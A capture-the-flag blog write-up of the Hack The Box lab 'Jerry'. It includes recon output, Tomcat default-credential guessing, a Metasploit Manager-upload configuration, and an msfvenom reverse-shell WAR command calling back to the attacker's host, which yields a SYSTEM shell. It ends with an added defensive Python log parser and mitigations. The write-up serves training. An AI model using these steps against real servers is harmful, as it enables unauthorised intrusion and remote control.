Path to OSCP: Jerry
As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.
Next up is Jerry, starting off with the usual nmap scan (I hope to do a deeper dive on nmap scanning shortly; I’m sure there are more efficient and faster nmap flags when it comes to OSCP/CTFs).
dr@nostromo:~$ sudo nmap -p- -A jerry.htb -oA nmap/jerry
[sudo] password for dr:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 15:22 BST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.038s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   51.81 ms 10.10.14.1
2   51.95 ms jerry.htb (10.10.10.95)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.78 seconds
Just a single port open, TCP 8080 running Apache Tomcat.
I like to kick off some directory fuzzing whenever a web server is discovered. Again, this is something I need to look into for efficiencies and how the various tools compare, but for now I instinctively kick off either ffuf or gobuster with a standard dictionary file while I perform further manual enumeration, as these scans can take quite a while to complete.
dr@nostromo:~$ gobuster dir -u http://jerry.htb:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://jerry.htb:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/13 16:12:03 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 0]
/http%3A%2F%2Fblog    (Status: 400) [Size: 0]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 0]
/External%5CX-News    (Status: 400) [Size: 0]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]
/http%3A%2F%2Fradar   (Status: 400) [Size: 0]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 0]
/http%3A%2F%2Fswik    (Status: 400) [Size: 0]
Progress: 220558 / 220561 (100.00%)
===============================================================
2023/08/13 16:29:03 Finished
===============================================================
In this case, nothing was discovered that couldn’t have been found from the front page itself (Tomcat Web Application Manager), but at least there’s some peace of mind that there’s unlikely to be a simple CTF-style open directory for a foothold. It looks likely that this will involve a known vulnerability related to the Apache Tomcat/Coyote JSP version.
A search on searchsploit for Apache 7.0 reveals the below as most interesting:
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass
I initially attempted manual PUT requests with Burp Suite to trigger a POC, as detailed at Apache Tomcat RCE if readonly set to false (CVE-2017-12617) – Alphabot Security, but no success. I next try the available Python script from searchsploit, 42966.py, but this also fails, with the output “Not Vulnerable to CVE-2017-12617”.
dr@nostromo:~$ python 42966.py -u http://jerry.htb:8080
[@intx0x80]
Poc Filename Poc.jsp
Not Vulnerable to CVE-2017-12617
After these failed attempts at CVE-2017-12617, it’s back to searchsploit, this time looking into Apache Manager, which throws up a few more leads:
Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit)
Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit)
Application Upload sounds promising: “used to execute a payload on Apache Tomcat servers that have an exposed ‘manager’ application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component”.
I load up the module in Metasploit and see that it requires authentication. This leads me to attempting a few Apache Tomcat default passwords, as found here: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
I get a hit from this list, and we’re into the Tomcat Web Application Manager:
More importantly, we have all the details we need to plug into the Metasploit module, including modifying the payload for Windows:
msf6 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  s3cret           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.10.10.95      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager/        yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT     7777             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Universal
We run the module, and immediately gain system access to retrieve both the user and root flags (“2 for the price of 1.txt”):
As with the previous box, this would be a waste of a Metasploit module in the actual OSCP exam, so let’s look at manual exploitation.
With access to the Manager, we can upload a malicious WAR file, and execute it in the browser to trigger a reverse shell to our system.
Using msfvenom we create the payload:
dr@nostromo:~$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=7777 -f war -o at.war
Payload size: 13318 bytes
Final size of war file: 13318 bytes
Saved as: at.war
We then upload it under the Deploy section of the Apache Tomcat Manager, which results in the below:
We set up a netcat listener on the port we specified in msfvenom, and can trigger the payload by either clicking the /at link in the above Manager window or browsing directly to http://jerry.htb:8080/at/, resulting in a system shell:
dr@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>
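As a defender-side counterpart to both the default-credential guessing against the Manager and the WAR-upload-then-browse chain above, here is an added Python example (mine, not from the original write-up or from Tomcat) that parses Tomcat access-log lines in the default AccessLogValve common pattern and flags both stages. The log lines are constructed for the example; the IPs and the /at context reuse the values from this post.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in Tomcat's default AccessLogValve "common"
# pattern (%h %l %u %t "%r" %s %b), modelled on the manager-upload chain above.
SAMPLE_LOG = """\
10.10.14.3 - - [13/Aug/2023:16:40:01 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - - [13/Aug/2023:16:40:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - - [13/Aug/2023:16:40:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - - [13/Aug/2023:16:40:04 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [13/Aug/2023:16:40:05 +0100] "GET /manager/html HTTP/1.1" 200 19845
10.10.14.3 - tomcat [13/Aug/2023:16:41:10 +0100] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 20931
10.10.14.3 - - [13/Aug/2023:16:41:30 +0100] "GET /at/ HTTP/1.1" 200 0
10.10.14.7 - - [13/Aug/2023:16:42:00 +0100] "GET /docs/ HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

def parse(log_text):
    """Parse log lines into dicts; lines that do not match the pattern are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events

def find_manager_abuse(events, auth_fail_threshold=3):
    """Flag (a) repeated 401s against /manager from one IP (credential guessing) and
    (b) an accepted POST to /manager/html/upload followed by that IP requesting a
    non-manager context, i.e. the freshly deployed WAR being triggered."""
    alerts = []
    fails = defaultdict(int)
    uploaded = set()  # source IPs that have deployed something via the upload form
    for e in events:
        path = e["path"].split("?", 1)[0]  # drop the CSRF nonce / query string
        if path.startswith("/manager") and e["status"] == "401":
            fails[e["ip"]] += 1
            if fails[e["ip"]] == auth_fail_threshold:
                alerts.append(("manager_auth_guessing", e["ip"]))
        # a 2xx/3xx on the upload endpoint means the Manager accepted the WAR
        if path == "/manager/html/upload" and e["method"] == "POST" and e["status"][0] in "23":
            uploaded.add(e["ip"])
            alerts.append(("manager_war_upload", e["ip"]))
        elif e["ip"] in uploaded and not path.startswith("/manager"):
            alerts.append(("deployed_context_hit", e["ip"], path))
    return alerts
```

The same two signals map directly to mitigations: lock the Manager to trusted addresses with a RemoteAddrValve and replace the sample tomcat-users.xml credentials before exposing port 8080.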